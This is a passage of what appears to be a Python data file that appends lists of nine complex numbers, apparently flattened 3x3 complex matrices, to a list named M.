M.append([(108.523883168+6.75267250928j),(-6.23290301695-13.6672931678j),(-10.0446687674+2.33387825312j),(6.58534822433+3.26715141788j),(90.7631674453-4.43186616644j),(-4.22691018241-0.640674885845j),(-3.13562420172-3.98210850292j),(-1.61937041744+3.40529524618j),(94.712949387+3.67919365716j),]) M.append([(92.2368629321-14.4647847137j),(-39.8978999964+35.6557809711j),(11.8512819384-2.7910011429j),(-8.31540598492-31.2647540805j),(47.2353711173+16.9488095638j),(-7.82788374465-10.574583177j),(-9.6910590122-20.5103097868j),(-5.25161127446+12.7607719283j),(14.5277659506+3.51597514989j),]) M.append([(104.982688021+19.5246718131j),(-16.0158081462+16.5859508029j),(-6.70393748124-27.502345869j),(-6.22819020351-3.84861662568j),(111.600781981-0.884076402581j),(7.58093226788-3.47957452998j),(-9.64558727751+5.95324865389j),(-13.3738547263+3.93198085252j),(120.416529998-12.6405954105j),]) M.append([(108.343119307+7.2483943158j),(12.4646987504-0.317196239992j),(-14.1625074072-5.27484273286j),(2.23755359703-0.613033275679j),(106.476789932-1.43011453299j),(2.06255635936+6.70244267765j),(-3.09037117763+0.106801399674j),(-0.521569805114+1.45284205604j),(110.180090761+0.181720217188j),]) M.append([(114.133073626+1.41711060617j),(-2.09284184927-2.96605655518j),(-0.516159729576-0.788885136226j),(0.480302798014-0.358711938831j),(115.659315693+2.51563074515j),(-0.572260378709-0.000627183678796j),(0.066083618788+0.850362650308j),(-1.96076076804+1.2154358095j),(115.207610681+2.06725864868j),]) M.append([(53.297927846+25.6267675902j),(11.9285262413-6.14471716782j),(-18.0410009102-28.1618764089j),(16.3633925304+13.0554603357j),(48.7172742894-7.278446718j),(-23.559448579-13.1161150867j),(-3.69238081921+10.9608770618j),(8.54073095157+6.33790918693j),(35.9847978646-12.3483208722j),]) M.append([(94.5843718344-14.2351583328j),(53.4124692396-16.2772454669j),(23.5488101976-55.1967218094j),(6.45872908028+16.5943374056j),(14.5187424453+11.8698837138j),(12.8807042132+2.96421084483j),(2.88270377901+22.7756208423j),(3.13011812131+14.2720043018j),(22.8968857203+8.36527461906j),]) M.append([(110.967139931+2.8365708183j),(-5.66344312328+10.9296446543j),(-0.958536420953-3.4287391272j),(-2.7669337437-8.02849681263j),(100.099902133+1.67375621553j),(4.18894704051-3.52052342334j),(2.39765450226-10.7531470115j),(-16.2108485074-13.3263188641j),(122.932957937+1.48967296618j),]) M.append([(53.6693050901+6.58947390373j),(9.61440036312-13.2043557697j),(-8.07973206465+6.24737872849j),(-16.6012480706+62.6435260715j),(101.687008779-12.8023206201j),(1.84775304926+10.9567256652j),(-52.0118294458+43.9171310704j),(-2.99140289045-18.1885653957j),(108.643686131+12.2128467164j),]) M.append([(47.2451622302+9.02853850279j),(10.6086372343+2.17585033366j),(1.93715511915+5.66459504422j),(1.66776141059+20.9479354016j),(80.0459514423+6.49326899426j),(4.61366820495+12.4295022853j),(-3.53938261882-22.068686288j),(-32.9631157029-1.74168760739j),(40.7088863275-9.52180749706j),]) M.append([(59.9591890144-3.12476171484j),(3.17678981557+5.54533766277j),(-6.68594582606+13.2699072738j),(-36.4795780837-31.4828946045j),(59.6636362218-13.2999308837j),(54.7163346647-3.82210075153j),(10.0510352682-13.8460857393j),(7.35984822767+5.19220020982j),(49.3771747638+22.4246925985j),]) M.append([(18.271413873+36.3883950189j),(81.3956763234-35.7758714377j),(66.2995514968+14.102485293j),(-43.1382488347+37.0191278805j),(152.866182914-28.4317296637j),(75.4971712914+27.9350733818j),(20.7086137288-28.510688681j),(-58.6348993401+35.1265404611j),(-4.13759678731-1.95666535513j),]) M.append([(99.1477832586-7.86197040182j),(0.545800244584-0.659096095187j),(-5.51029935018+10.126141394j),(2.5258185353+7.10437068387j),(92.6011386786+0.841025990124j),(-3.00583266425-6.14686933056j),(-10.3521505469-12.331231444j),(0.627590053937+1.08627569349j),(102.251078063+13.0209444117j),]) M.append([(-7.32280472325+48.0959828985j),(14.8069742474-73.8032960452j),(-27.6816085683+10.0426491583j),(-51.6229818885-1.99930152474j),(86.8854883411-4.53888797086j),(-23.0293614357-22.2672159192j),(24.4345307799-85.8968331373j),(-2.95300465663+118.06829272j),(74.4373163821-37.5570949277j),]) M.append([(99.9852579972+4.9243466856j),(3.98845854778-3.45120894925j),(3.55084601131+3.11512059466j),(-41.2107964195+18.004753791j),(122.326103138-5.46412999639j),(6.03518857851+3.26878928694j),(-4.23355651943-37.7613093766j),(4.94388534306+5.31526724282j),(114.688638865+6.53978331079j),]) M.append([(107.193396752-4.04355996891j),(-2.97623852307-3.7865916188j),(0.353515298394-11.0982974211j),(-4.05971804492+3.71347463504j),(108.390968152+1.71427513443j),(-6.78585080308-4.57380741768j),(-2.01411842652+5.48360295584j),(2.87069560103+2.97753755639j),(109.415635096+8.32928483448j),]) M.append([(112.886853388+0.42419463811j),(-1.13122847521-1.34991766884j),(-2.24466505741-0.220195726187j),(1.38031100455-0.059316082292j),(115.744999304+1.61158339112j),(1.31323879379-0.41796994851j),(-0.268460215768+2.36116555925j),(0.15249913781+0.284012018111j),(116.368147309+3.96422197077j),]) M.append([(39.3941098935+0.83543798668j),(5.37372325417+2.64881012523j),(-10.3626264304-2.8535358216j),(-10.3533065598-5.06578145775j),(59.6535702053-1.50959352323j),(-1.56988593481+9.73799265627j),(-7.40933073977+0.659583367662j),(9.98467885795-4.63410270894j),(38.9523199012+6.67415553655j),]) M.append([(100.456983364+1.57019182875j),(-1.50325446504-0.573965506629j),(1.27890104794+0.457783566279j),(-1.40942605752+0.0195775751571j),(99.4878453072+2.0120961744j),(2.11901697852-0.269293618202j),(-1.22114485978-0.930407805145j),(-2.07037532237+0.631555779796j),(103.055171329+2.41771199684j),]) M.append([(37.8261025094+59.0740502304j),(12.3275469192-34.537730184j),(-40.3231696592-47.391779913j),(59.5173262542+30.3431742017j),(76.3985303498+3.68136109435j),(-23.3774769527+43.7050874256j),(-81.5284324772-26.5934350088j),(35.4916689667-5.59856100142j),(121.775367141-56.7554113248j),]) M.append([(108.762870094-9.87768014665j),(16.7234063074+0.093424996024j),(14.2454345829-24.888356233j),(3.55788303901-8.05807631766j),(67.2582049418-0.463048743745j),(-2.25743630847-4.43896227078j),(-8.74042028728+21.0084080745j),(-4.91631053549+6.46065818873j),(70.9789249643+16.3407288904j),]) M.append([(32.0200113443-0.950350101841j),(41.9747666788-27.8308554395j),(39.5453327615+14.5666430247j),(-10.9629375746+26.3954704684j),(57.5936930294-39.6021217071j),(21.1132379211-27.0815937889j),(-52.3401241576-30.8208195638j),(94.539435127+1.42728472092j),(126.386295626+46.552471809j),]) M.append([(66.8568977486+34.8326600517j),(5.08703473417-60.2762335935j),(58.1742583628+24.1211274838j),(-26.6784681087-13.5154493246j),(144.575227866-8.8868778694j),(0.586508722087+30.9367186015j),(44.9480032298-30.2272028445j),(-4.94424670984+52.3516302153j),(65.5678743849-19.9457821823j),]) M.append([(92.9844710453-16.1231990703j),(19.4251687056+45.3917141403j),(-37.1354780012-2.27855816085j),(2.49814033647+1.96989794221j),(85.8349252242-15.5833435075j),(16.0271745738+1.62551755561j),(-22.8894182401-6.09075066922j),(50.2525183243-10.2277702997j),(81.1806037304+37.7065425777j),]) M.append([(13.4463259086-7.15215773815j),(-32.1918161485+9.17290287224j),(-36.6029969533-22.6223208532j),(0.567511493169+14.8198441187j),(66.0039703544+1.10474457897j),(55.7030485071+38.0082550213j),(12.1224074716+24.1160151526j),(28.0214760806+2.77055452391j),(65.549703737+12.0474131592j),]) M.append([(191.692097371+0.122842487974j),(-11.7999475184+62.7981167903j),(-25.0472067281+8.69719820375j),(-2.06178315572+113.036297758j),(24.6424748444-18.8047296454j),(-7.70880357078-37.9648770154j),(4.5272687794-62.4351955188j),(50.2037728864+15.2198181512j),(120.665427785+24.6818871574j),]) M.append([(112.288959183+0.20424906291j),(7.4120805602-4.00140098489j),(7.66374485208+5.53408616148j),(1.76348192394+0.717361127374j),(110.492380051+5.89924546478j),(-5.93777359374-1.323235534j),(-0.137206492587+1.0798380636j),(-0.364947971047-1.68606389496j),(116.218660765-0.103494527688j),]) M.append([(16.5884726347-19.0463085506j),(69.7199297662+102.411354802j),(41.1414921353-9.8391535644j),(-15.5341362547-8.0731521105j),(122.619196379+21.8867068949j),(6.65917522668+1.1157167912j),(-38.8711715004-22.2826642072j),(14.7037216953+53.1743424479j),(133.792330987+3.1596016557j),]) M.append([(34.7920145116+9.80761861823j),(-15.603741422+42.7070700846j),(22.0567195103+41.4256946835j),(-18.900240103+4.06209567904j),(4.41903410011-4.79539473745j),(-27.6026631637+16.0078962328j),(20.9494430514-2.45060149603j),(20.8053640064+18.2706325474j),(64.7889513883+0.987776119218j),]) M.append([(5.88137684802-4.40983440315j),(6.62722387861-35.8412148739j),(11.623577465-52.2209320653j),(5.32234062756+8.92062433897j),(63.2505170926+19.4344996863j),(24.2787586507-1.19446978367j),(-4.22173575166-13.2653472022j),(16.9058324901+6.23928698577j),(97.8681060594-9.02466528312j),]) M.append([(26.0453428249-42.9789360717j),(-38.9010255492-38.3303391713j),(-26.8773205185-43.7865745305j),(-28.9638875014+51.4254652888j),(34.0622397853+69.8696979859j),(-20.7178850964+63.2802939212j),(83.1520487758-7.03929312854j),(86.1923460014-42.3003646175j),(133.89241739-20.8907619143j),]) M.append([(122.805320218+1.94550354182j),(7.10355757032-0.0474624168284j),(-0.707727030127+4.56880499645j),(-22.6235955534-0.632726914847j),(89.6019777102+3.13303854992j),(-5.06309369853-17.5487348461j),(-4.77889205673+3.63397587351j),(-3.5150881112+5.94415349976j),(114.592702072+0.921457908258j),]) M.append([(67.6515397243-44.8976535882j),(9.61776163301-38.3877620875j),(-20.9306924264+40.8101632499j),(-43.9816145215+78.5104792185j),(29.4872445678+65.7603720225j),(33.9365610779-62.3835861642j),(-52.0252990454+21.4218024474j),(-33.1153222304+24.0014812055j),(86.8612157079-14.8627184343j),]) M.append([(104.37304627+17.8869987907j),(-3.29713085743-16.3938254844j),(26.8580176752-11.698054793j),(-8.04590450541-13.8817762549j),(129.370891365+4.97557909646j),(-0.0497526629755+23.9647472608j),(11.2226726476+8.80053366181j),(-9.02324882831+1.33453617825j),(111.256062366-16.8625778872j),]) M.append([(100.429647568-10.2859434026j),(-5.83922454523+11.5846291571j),(14.525989105+16.7704790223j),(20.4272239002+4.96219918571j),(71.2405318305-6.38000902037j),(-15.1282180895+26.2913870814j),(19.1040423102+14.3209513136j),(-17.0016134351-14.1690125084j),(64.3298206019+22.665952423j),]) M.append([(58.5997012635+20.3647753695j),(-30.3967049801+52.0472653929j),(32.1173578733-37.7440956958j),(-2.55239415503+17.5596074724j),(126.679299379+22.8933828687j),(-11.8743470281-18.037111431j),(5.73451667283+52.3610766124j),(39.7555139883+40.763225194j),(82.7209993574-37.2581582383j),]) M.append([(90.7420003329+14.2570482337j),(7.66178361506+2.78248894418j),(26.3917906964-9.94051042092j),(4.5784096611+16.5903123358j),(93.977227648-9.95588448949j),(0.550086268298-18.9165581675j),(41.361932487-7.58645861606j),(-23.2324401396+7.60276195691j),(82.2807720192+1.69883625582j),]) M.append([(63.8707417549-49.6984578065j),(4.75111700338-15.0723601325j),(102.168228361+33.8427772895j),(-40.6444610171+8.71730996672j),(83.2423681192-4.079311088j),(42.9265721863-62.127429383j),(27.381668148-17.1905674928j),(9.92834889726+0.969623252841j),(78.8868901259+59.7777688945j),]) M.append([(57.1586324324-34.4490269349j),(-28.7171960635-7.52509647898j),(32.6686491227+0.722022821731j),(-50.5888460692+60.8683905086j),(76.9454146445+14.3548900726j),(-53.2974460749-24.4594538993j),(38.4079780185+18.9044054032j),(-5.41594381583-21.4428339467j),(19.8959529231+26.0941368623j),]) M.append([(110.462357913+38.7556437787j),(-24.9257415571-45.1503894964j),(-2.91580557056-21.3008456869j),(-18.5431028686+19.7132585351j),(119.633260707-33.1327610331j),(7.74464252568-13.46765655j),(14.3108090585+7.77956190785j),(-21.5155049671+3.0107034586j),(106.90438138+0.377117254394j),]) M.append([(104.923231131-3.53404815477j),(-3.80407873645+8.7391878835j),(-5.12801256418-7.63106311833j),(2.03802518737+0.819204402023j),(112.219323668+0.461449474256j),(2.60135074012+1.05503118012j),(-1.9543863515+5.99056645641j),(10.1592747955-3.89573601202j),(107.857445201+9.07259868052j),]) M.append([(114.577206973+3.24487858017j),(0.80728551157+0.0106583077375j),(-0.056986329301+0.34771111642j),(1.26802360511-1.25163889489j),(115.259002582+1.05709085132j),(0.793255766155+0.0397604925347j),(-0.157306755368-0.199225444106j),(0.0711041282353+1.08090434027j),(115.163790445+1.69803056851j),]) M.append([(39.1480139807+6.21527433685j),(-26.0300394797-6.66873975934j),(-1.73766464236+7.91051886019j),(-8.02017936728+4.92623329792j),(52.8681379803+2.38975508541j),(-4.37363165502+1.49790432728j),(7.35825967381-0.515463783055j),(17.1141283697-1.63219163676j),(45.983848039-2.60502942226j),]) M.append([(155.562661708-5.90134456237j),(61.0747468382-24.2263376468j),(68.4298244644-121.240438403j),(12.622386601+102.978541195j),(29.2834974991+43.6405920655j),(89.0865425324+42.1358045723j),(-14.6878265088-87.689832884j),(-18.9364518336-35.8067071662j),(-68.8461592072-31.7392475032j),]) M.append([(98.9652581934+11.1700534194j),(19.9934618874-24.6624206455j),(-16.116159773-11.6823426366j),(23.0266099676+17.5292267822j),(61.9927922058-21.7574612573j),(-12.9504450495+27.3909637501j),(10.8208833279-6.90729501126j),(-24.5320054925+23.1105399439j),(125.041949601+16.5874078379j),]) M.append([(50.9024890827-30.581210944j),(24.6688496831+30.4776602124j),(-15.2886717259+42.382238213j),(-4.15423949256+30.0035406376j),(106.679813911-15.5356634317j),(26.1501415507-14.4649071239j),(-62.21221773-17.0808185218j),(45.9616277345+30.6410353748j),(101.417697007+52.1168743757j),]) M.append([(-0.0236066944812-9.61819081937j),(-124.525135165+0.331358769395j),(-102.116477586-67.1878347855j),(-19.2598313721-19.0996901603j),(56.0789791334-8.86139589735j),(-15.4456759126-28.8069044979j),(65.3402979759-11.2337342789j),(112.422787285-32.9782172663j),(187.944627561+24.4795867167j),]) M.append([(113.725814403-6.74791662877j),(14.7711698409-1.87518512469j),(-2.32336706104-11.0837939777j),(-3.55196374966+0.260958365386j),(122.656194707-3.21172979913j),(-3.84523598011-4.50310599971j),(-16.1655506394+20.7290991061j),(-15.7730603155-34.2143984302j),(90.6179908903+15.9596464279j),]) M.append([(58.3959938059-16.4373246815j),(-0.650919661328+11.8324786653j),(-22.068579967+2.75157348892j),(-38.3601075484+25.2313234574j),(59.3161085335-9.78556932665j),(33.4940307377+10.9952301047j),(-55.9188027128-7.93819403561j),(11.0338080585-0.892224310565j),(70.2878976606+32.2228940081j),]) M.append([(116.740432944-0.541906775456j),(-1.04920536736+0.595850286253j),(1.54779528345+1.649256268j),(-4.43915175276+4.51228959497j),(104.706299698+12.6625593458j),(9.50658083155-8.9133625579j),(-1.19833614555+2.21285084956j),(-8.53933859386+13.0915430176j),(123.553267358-6.12065257034j),]) M.append([(68.0352736483+10.4464894537j),(14.2423209911+20.8364949773j),(17.8830609548+1.57028998653j),(6.72263293242+2.29667286833j),(91.7904237634-4.99531779704j),(-5.19006096259-2.15012302516j),(25.2590550011-10.5564648514j),(-15.0742338543-22.7553420169j),(72.1743025882+0.548828343297j),]) M.append([(75.3957608201-55.0660996011j),(92.3208902713+56.541039361j),(-23.9675601533+66.1657178873j),(9.37173808315-0.979798723497j),(94.9885479657+5.81900054715j),(-4.03321660782-6.87957603894j),(-30.2014107372-45.0551143177j),(73.2817969927+36.5891499258j),(96.6156912142+55.247099054j),]) M.append([(113.681232349+25.9009382626j),(9.08169757578-28.6738563623j),(-9.47280327531-25.2292709275j),(20.8183929991+2.6964432483j),(72.2881470493-11.7109135058j),(-23.0941757066-8.21011038785j),(0.522271008017+23.7484532825j),(-2.55041370855+7.55993473766j),(81.0306206016-8.1900247568j),]) M.append([(63.0028627509-1.0376202684j),(-14.0543395621+56.2261142698j),(-19.9375524947-39.83934734j),(2.63486805328+6.1564394435j),(117.78637687+1.10749000682j),(-7.64787193538+21.9357024148j),(4.3818213832+22.8849762317j),(28.741161429+0.143086622317j),(64.2107603788+5.93013026158j),]) M.append([(121.835835528-1.08254826457j),(3.03695005246+0.742095985035j),(-6.6960444339-6.13976491394j),(6.46311602942+8.84549277095j),(115.247967023+9.73296623013j),(5.74674018052-10.8586340027j),(19.5612423955-13.7848765809j),(17.0870668758+10.2987121859j),(89.9161974488-2.65041796557j),]) M.append([(50.5991523389+0.935152779877j),(-1.80731019211-3.37988892303j),(-0.143813935763-0.571462571762j),(21.7767131759-3.49777138381j),(79.2176766448-6.15360502326j),(1.10071808796+15.3172330683j),(10.5037377566-12.166018242j),(18.2004434291-40.5159039808j),(57.1831710163+11.2184522434j),]) M.append([(111.090163453+1.43774832648j),(-5.74151551997-0.321017529585j),(-1.38994317581+0.3684982205j),(-1.62535221799+1.53519764827j),(116.771310914+2.94881317616j),(-0.594010189217-2.50195782585j),(-5.05565420558-3.02126932248j),(-5.3701736295-0.78781466513j),(117.138525633+1.61343849736j),]) M.append([(56.5919107404-12.0822714216j),(15.7578259336-22.0297864824j),(-46.2954790322+12.9989911605j),(-8.20416123825+2.12995876167j),(92.4925634146-5.14767517477j),(-7.55669037302+6.7568303999j),(-10.5638503125+12.1235353152j),(-7.99161697328-9.025183964j),(90.915525845+23.2299465964j),]) M.append([(102.316677932-3.27278695089j),(-15.1391619873-22.3319274518j),(-23.6453155306-19.7256713805j),(-15.9333274551+3.46256130617j),(72.0238623984+6.82914499103j),(-33.0561762202+2.94334425749j),(-10.9510793907+1.4552054922j),(-21.5980624733+6.08654438229j),(95.6594596692+2.44364195986j),]) M.append([(84.3575752344+2.27880392774j),(14.922388451-7.36906985668j),(2.56483369495-11.1310357298j),(25.7563826376-10.9982863399j),(107.981007219+31.987155429j),(45.2165339058+46.1174378506j),(-15.9789109302+6.93228844609j),(3.63268966244-25.8514279961j),(71.6614175465-28.2659593567j),]) M.append([(86.6256560807-28.5292404374j),(15.8070640853+7.73507100662j),(2.51535835235-36.3717939078j),(0.238699528289+34.2494020898j),(85.275591919+0.869542473826j),(-2.60391122782+27.2959875315j),(11.4750822801+52.5811811758j),(6.30515826501-16.9612721378j),(72.0987520003+33.6596979635j),]) M.append([(115.925409722+15.4033171645j),(12.9881610183+5.95599114694j),(-5.65907494832-2.58706732318j),(19.7021918068-24.1953820498j),(97.8545212363-22.5599871383j),(11.430372942+10.7933923334j),(24.1239327323+3.01774329575j),(8.33253125082-22.0621990466j),(113.220069042+13.1566699738j),]) M.append([(64.6196563573+6.32575695089j),(26.3468818334-14.0345745117j),(1.629637524-17.6888027008j),(11.1919655181+2.24607159792j),(60.6787613368-4.0609861703j),(0.35749226825-12.5734269078j),(-3.01914910958+8.8071218996j),(1.12915475669+14.2764720911j),(67.7015823059+3.73522921941j),]) M.append([(115.314986777+1.57905413963j),(-1.01901166625+4.7329832044j),(-0.48364715715-4.78734429944j),(1.37507417239-1.38168710064j),(118.163556116+1.51611091101j),(-1.01807707234+2.38214946013j),(-0.303450519897+3.28782346349j),(3.08070115912-0.681171771523j),(111.521457108+2.90483494937j),]) M.append([(94.3781860368-17.1412942391j),(31.8430646214-9.37692790289j),(-1.6829199277-43.4123935683j),(14.6014276104+11.05708358j),(81.83439396+34.5706295776j),(36.0306056943+24.5901366024j),(-14.7286906192-9.11308416953j),(3.74901796293-29.3186261729j),(56.7874200032-11.4293353385j),]) M.append([(137.484662599+5.36089170766j),(23.3560812591-4.21097538369j),(-24.2318398546-1.3479422429j),(-96.9821283371-7.11601806644j),(18.1819351778+25.7195353097j),(90.751780613+2.88049471688j),(-3.28504289395+26.3792082403j),(7.16991964565+28.2921907118j),(111.333402223-25.0804270174j),]) M.append([(58.5521715043+2.60521440623j),(-5.97075370751-34.3709669912j),(-0.961067040131+18.5188387837j),(2.4105597143-7.02628457593j),(110.297389875+7.20644768541j),(-13.5918100235-13.8278156848j),(35.6960894296-41.5186298583j),(27.2859828168+30.906924939j),(93.1504386211-3.81166209164j),]) M.append([(97.8297185225+31.5180146817j),(-10.37322862+36.7315579055j),(9.59594646576+24.6375559009j),(-22.5806020013-16.7875810289j),(81.1431878069-14.8249074771j),(-27.0681989914+0.378290256476j),(-17.5687291592-21.2961805826j),(-12.0757766122-24.1618487708j),(68.0270936706-10.6931072047j),]) M.append([(117.705128739+19.5530959345j),(14.5802607126-46.2260770242j),(14.366092883-43.1191130218j),(5.34536256697+0.423930871118j),(108.133775073-8.34752723554j),(-9.74177310006-7.64909094035j),(5.42418035151+1.38758912786j),(-21.6813086509-4.69877737503j),(101.161096188-5.20556869898j),]) M.append([(61.4828468233+65.7815121623j),(14.6244414897+73.9022696871j),(49.0765652751+82.7172286167j),(-29.9465193423+15.1223320734j),(12.1450593156+15.0010946792j),(-32.7343444348+30.9012462191j),(57.1314109662-37.2106076712j),(69.9035612073-42.6567715794j),(111.372093861-74.7826068414j),]) M.append([(109.835326181+12.6445152441j),(3.12048473765+3.30834149061j),(-2.22301616967-8.45138328717j),(25.5834169578-6.91576805876j),(117.842837848-5.31720081947j),(-4.22510485114+15.9643627138j),(-2.56492949708+1.42856192605j),(1.0923423144+1.06402640173j),(117.321835971-1.32731442467j),]) M.append([(55.5148717592+23.3235898867j),(-28.6184175335-22.4867154147j),(-36.9155184794+14.0539037142j),(31.1072724143-5.96068223754j),(107.99216711+23.8794066417j),(28.4704083243-2.27445963905j),(-25.0835119223-44.3880359366j),(25.6972729006-36.0017792495j),(74.4929611305-41.2029965285j),]) M.append([(62.5521650589+7.93938618354j),(13.7458995514+19.8808255643j),(-27.828550218-17.6182025077j),(51.7904824459+24.162637483j),(116.443383703-36.8093017938j),(9.9663783835+58.3090851022j),(3.32456736742+43.3648652788j),(37.8972250793-9.06443325729j),(57.0044512381+34.8699156103j),]) M.append([(100.728513468+33.2787813093j),(-0.86663123633+14.7163734981j),(31.7990605866-19.4173570634j),(-5.05950463804-17.9243136579j),(104.375094283-11.2307968411j),(-26.0878579283+13.9170309348j),(74.8331697795-19.9668193659j),(15.9872183129-28.062705073j),(25.8963922488-16.0479844681j),]) M.append([(102.783791682+2.44883457366j),(7.29757114889+3.60217065132j),(-0.433255935257-1.767098214j),(2.84307046295+1.56706656125j),(115.556637588+1.54337559442j),(0.199004344298-2.17943612499j),(0.341063214315+11.7777240973j),(4.93249399157-7.36680168501j),(112.65957073+2.00778983192j),]) M.append([(110.875264099+1.55588007157j),(-6.3150051137-1.75598614984j),(-0.823705952803-2.82034158182j),(-1.71801876407+1.06357523242j),(113.498755272+2.93505936802j),(-0.397323378705-0.991761984312j),(-1.44666989398-3.48376966699j),(-1.88166083959-3.15595491587j),(116.625980628+1.50906056041j),]) M.append([(69.6530673572+0.668297494165j),(-7.01136227692-9.64500193743j),(6.43180253859-25.1868689469j),(-6.01998497322-2.62425378135j),(48.9719684353+0.159658714203j),(-9.92959811163-17.8628993124j),(14.4339861432+33.0337718741j),(9.84013135468-6.55129192453j),(99.3749642075+5.17204379163j),]) M.append([(18.1853776424+10.8359524753j),(-24.8942634039+3.21255029714j),(-13.1055547224-9.88145905027j),(-14.9775730646-2.23616017906j),(33.9463664701-16.583612202j),(20.7943867109+1.89078123861j),(7.6810025078-5.68966232715j),(-0.355069025575+21.2027656968j),(-0.13174411243+11.7476597267j),]) M.append([(81.1384489794-1.3171559424j),(-5.82035915485+11.5915600392j),(-14.8894645084-16.9331291029j),(-33.6032541666-2.7117565001j),(49.6374297829-3.70292429507j),(18.2096336803-4.20874178194j),(-21.949261747+1.50359706025j),(0.590122701148-7.92699356515j),(74.2241212377+11.0200802375j),]) M.append([(122.592797082+3.01480215744j),(-7.57765488056-1.00275567683j),(7.08284290155+1.44402675229j),(-12.1541564161+1.13682337053j),(129.604263132+0.251094997809j),(-12.8085580173+0.894575424046j),(-19.6362112542+2.00035707819j),(23.6712170722-2.69892389039j),(92.8029397864+2.73410284475j),]) M.append([(90.7111394899+48.833196889j),(5.46985079389+35.8829538835j),(-18.0939349273+28.9183375221j),(-30.17388265-73.5436837191j),(58.7001231482-49.3548007958j),(7.88858383648-54.9031626721j),(-6.38340670124+11.373524449j),(-3.45391511136+10.2130361221j),(82.5887373619+6.52160390679j),]) M.append([(-310.368968552-171.885210117j),(-445.082373557+125.943332327j),(-99.2560560292+240.515085741j),(246.887948616+399.774917034j),(557.943346062+162.658908794j),(218.71661525-146.914359987j),(-19.8273098449-153.733698033j),(-113.588872997-110.322041885j),(19.42562249+15.2263013229j),]) M.append([(65.0279765644-44.3935969727j),(-25.0380613797+9.49261334688j),(-35.0469949732+65.3163975456j),(8.82597565565+26.5309766572j),(111.006612837+3.73920334664j),(17.1146095918-10.6575563033j),(-34.3640678905-36.0995711279j),(-27.3439471717+8.23095669148j),(86.9654105984+46.6543936261j),]) M.append([(43.2312485515-8.97424066466j),(-3.61748927081-21.7185117296j),(-19.4824419641+16.562541547j),(-44.9929479214-3.73361516897j),(68.2328073462-16.6958049352j),(-23.5828842354+30.7382081482j),(-45.739430699+93.4232381512j),(-17.3687690338+1.92416788447j),(132.535944102+31.6700455999j),]) M.append([(84.518375099-23.0236124002j),(-23.8332411821+3.23378613749j),(-3.43360098734+20.6957103622j),(-28.2611442257+19.0289397849j),(113.060017601+21.3679873289j),(16.5080651166+9.34646977893j),(-21.3217427547+13.3265576099j),(-2.28808330548+13.4221657929j),(129.4216073+7.65562507137j),]) M.append([(60.079302333+24.2727063377j),(3.93032962037+15.3895756963j),(-13.8145394646-49.330140978j),(-16.3033545541+2.99390022486j),(42.6884959702+1.54545210432j),(45.7059823867+10.3747328032j),(-14.9836225118+23.2628302936j),(-11.2412852433+12.1021077628j),(89.2322016968-19.818158442j),]) M.append([(114.797665664-1.59756589334j),(3.10299344864-0.88542894909j),(1.45003700707+2.33627628348j),(2.69822282515+8.77926959128j),(108.610174799+3.38292678458j),(-6.1486902623-5.3226493745j),(-2.18628225425-3.80921305973j),(3.02767182234-1.04136948002j),(121.592159537+4.21463910875j),]) M.append([(75.7090445628-9.14597582659j),(24.505724388+2.91087600939j),(11.5743410561+28.2204321634j),(-6.38914930122+5.85855985417j),(91.6152764501-6.98455341647j),(8.3735815967-5.85595112362j),(10.1970418579-22.5303612321j),(2.91946014356+27.7244589989j),(64.6756789871+22.1305292431j),]) M.append([(111.427817876+8.67881590014j),(57.5898680863+26.5766593491j),(35.7248763994+38.5945030857j),(-2.20577857015-5.5119371923j),(41.7037872629-25.1329768345j),(-45.6758869497-43.5246295485j),(-4.36044855744-1.90716768348j),(6.25389009501+21.5226379028j),(113.868394861+22.4541609344j),]) M.append([(108.538822127-2.43339632347j),(16.8656952598+15.1052596067j),(-6.36060310005-12.5884441799j),(-25.937211405+73.9250103278j),(2.18129124677-0.982088646371j),(26.1196481984+21.3115081703j),(22.7418470121+105.997848902j),(-114.644954476+70.16935783j),(153.279886627+9.41548496984j),]) M.append([(54.0166094133+24.629422505j),(49.2598357909-9.42264708398j),(-19.9289854877-33.9292979621j),(22.8880312225+26.7545188113j),(100.34245343-22.3016401434j),(-15.825571853+20.1187699928j),(-4.87479034448+11.4370108824j),(17.6561295694+19.7607267594j),(89.6409371569+3.67221763841j),]) M.append([(109.832535024-0.516506233961j),(-5.54191723848-5.04497590349j),(-4.51307860573-0.842993974255j),(-9.21691805291+10.0907468359j),(105.136287798+4.80414434877j),(-4.59016174482-1.038149961j),(-14.3787101252+6.35243284085j),(-14.8895353945+0.149316105179j),(112.031177178+1.71236188519j),]) M.append([(45.5713363647+22.1674092209j),(-4.44729173118+10.1692671082j),(10.0596804652+10.9373856239j),(60.8709038005+0.45802716418j),(83.9123955578+5.44725548989j),(18.0883465855-29.479916608j),(46.640605608-14.8345111815j),(23.2733647641-0.56292458948j),(63.5162680775-21.6146647108j),]) M.append([(130.376397933+1.39462607795j),(6.28732145441-4.81315874201j),(-5.00569574299+5.24189420316j),(-33.4500727262-4.79977106352j),(93.59757587+17.0561471585j),(25.7785257081-8.82533637558j),(-11.4176476851+16.9402244751j),(-0.14665218922+17.1521796917j),(121.026026197-12.4507732365j),]) M.append([(57.297785765+4.22328873337j),(7.33188816075+14.0699972383j),(36.3770646975+1.41168973715j),(-1.34937065285+2.81404461518j),(92.6845676333+2.34087683428j),(3.36055758592-2.02196151328j),(9.54989066449+1.31415019571j),(-0.916744442562-2.64813285945j),(83.0176466016-0.564165567653j),]) M.append([(58.8823657217+53.63342336j),(40.8935279583-49.6946297304j),(67.036697066+2.22424596705j),(-8.56809604994+28.6139343827j),(115.113777303-25.1156847266j),(26.425278307-6.58447296816j),(42.9324063776+10.8147976123j),(-37.8968699451-8.72609590014j),(93.0038569748-22.5177386333j),]) M.append([(95.1975470791+8.33083820871j),(-6.672502456-13.8757216219j),(11.8165814138-0.99053490489j),(-4.67894165482+24.8656011251j),(107.296535805-5.76150526253j),(3.28829711394-5.70974873357j),(6.71160019256+45.9674655481j),(56.1170219523-12.1692675653j),(61.5059171154+3.43066705382j),]) M.append([(50.5040844792+24.1072507735j),(-48.4992377112+15.6324777109j),(-24.6279191159+19.7031186044j),(-54.8290937143-23.1173432489j),(60.0527029164-19.616579702j),(-33.6879486265-4.45510782421j),(68.3178721389+19.3524934843j),(41.7113550549+20.3214969954j),(133.443212604+1.50932892853j),]) M.append([(113.934654832+4.49261566369j),(-0.765142988051-2.28553181803j),(3.68951003246+4.63298705601j),(2.3258178386+9.30821787963j),(103.76943144+7.27595413564j),(14.0658219535+4.49665788291j),(0.445288672444-6.05101374468j),(14.591419276-2.8663553918j),(109.295913727-5.76856979933j),]) 